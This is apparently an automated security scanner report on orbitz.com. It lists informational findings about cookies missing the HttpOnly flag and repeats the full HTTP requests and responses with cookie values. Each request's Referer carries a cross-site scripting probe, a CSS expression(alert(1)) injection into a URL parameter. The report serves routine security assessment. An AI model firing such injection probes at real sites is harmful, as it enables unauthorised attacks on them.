Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "19ad-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 6573
Server: Apache
Date: Wed, 02 Feb 2011 16:04:46 GMT
Age: 10978
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 6573

/* Cookie object
   Manages one cookie with the instantiated name.
   Cookie is not retrieved until get() is called.
   Individual values are separated by delimiter (|)
*/
function Cookie(name)
{
   this.de
...[SNIP]...

12.708. http://www.orbitz.com/shared/js/deals.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/deals.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/deals.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "21d9-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 8665
Server: Apache
Date: Wed, 02 Feb 2011 16:04:45 GMT
Age: 10759
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 8665

//Function for Landing page

var textDivider = function(incomingDivId, forcedDivideAt) {
   var sourceDiv = $(incomingDivId);
   var sourceHtml = sourceDiv.innerHTML;
   var divideAt = sourceHtml.substring(
...[SNIP]...

12.709. http://www.orbitz.com/shared/js/destinationDetails.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/destinationDetails.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/destinationDetails.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "a5a-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 2650
Server: Apache
Date: Wed, 02 Feb 2011 16:04:44 GMT
Age: 10616
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 2650

var whichSubTab = "";
var bIsPopup;
var isDateless=true;
var isMatrix =false;
var isHoodMatrix=true;
var botIds = ['air','aph','apc','ahc'];

function getEl(id) {
return document.getElementById(id);

...[SNIP]...

12.710. http://www.orbitz.com/shared/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/global.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "ae75-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 44661
Server: Apache
Date: Wed, 02 Feb 2011 16:04:26 GMT
Age: 11420
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 44661

// ******************* CLIENT_SIDE SNIFFER CODE *******************
// stylesheet selection removed - used for some DHTML stuff that is not on every page, but is on
// enough to justify being in glob
...[SNIP]...

12.711. http://www.orbitz.com/shared/js/lib/dialog.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/dialog.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/dialog.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "bbe3-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 48099
Server: Apache
Date: Wed, 02 Feb 2011 16:04:40 GMT
Age: 11250
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 48099

/*
** This is the global dialog object. It is extended by the Lightbox and
** Microcontent objects. These should be used site-wide for any layered
** dialog implementations. The Dialog object shoul
...[SNIP]...

12.712. http://www.orbitz.com/shared/js/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/prototype.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "1faca-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 129738
Server: Apache
Date: Wed, 02 Feb 2011 16:04:25 GMT
Age: 11493
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 129738

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...

12.713. http://www.orbitz.com/shared/js/lib/prototypeExtensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/prototypeExtensions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/prototypeExtensions.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "463a-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 17978
Server: Apache
Date: Wed, 02 Feb 2011 16:04:35 GMT
Age: 11377
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 17978

/*
File contains:
- extensions to prototype.js
- extensions to javascript core (or hosted) objects
- mostly a subset of util.js from Austin codebase
*/

/*********************************************
...[SNIP]...

12.714. http://www.orbitz.com/shared/js/lib/scriptaculous/src/builder.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/builder.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/builder.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "1288-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 4744
Server: Apache
Date: Wed, 02 Feb 2011 16:04:28 GMT
Age: 10911
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 4744

// script.aculo.us builder.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributabl
...[SNIP]...

12.715. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/controls.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/controls.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "87e3-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 34787
Server: Apache
Date: Wed, 02 Feb 2011 16:04:34 GMT
Age: 10986
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 34787

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...

12.716. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/dragdrop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/dragdrop.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "79c6-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 31174
Server: Apache
Date: Wed, 02 Feb 2011 16:04:29 GMT
Age: 10785
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 31174

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (
...[SNIP]...

12.717. http://www.orbitz.com/shared/js/lib/scriptaculous/src/effects.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/effects.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/effects.js HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573798141:ss=1296573790782

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:04:32 GMT
Server: Apache
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "9759-49ad5c2473240"
Accept-Ranges: bytes
ntCoent-Length: 38745
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 38745

// script.aculo.us effects.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (http://e
...[SNIP]...

12.718. http://www.orbitz.com/shared/js/lib/scriptaculous/src/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/lib/scriptaculous/src/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/lib/scriptaculous/src/scriptaculous.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
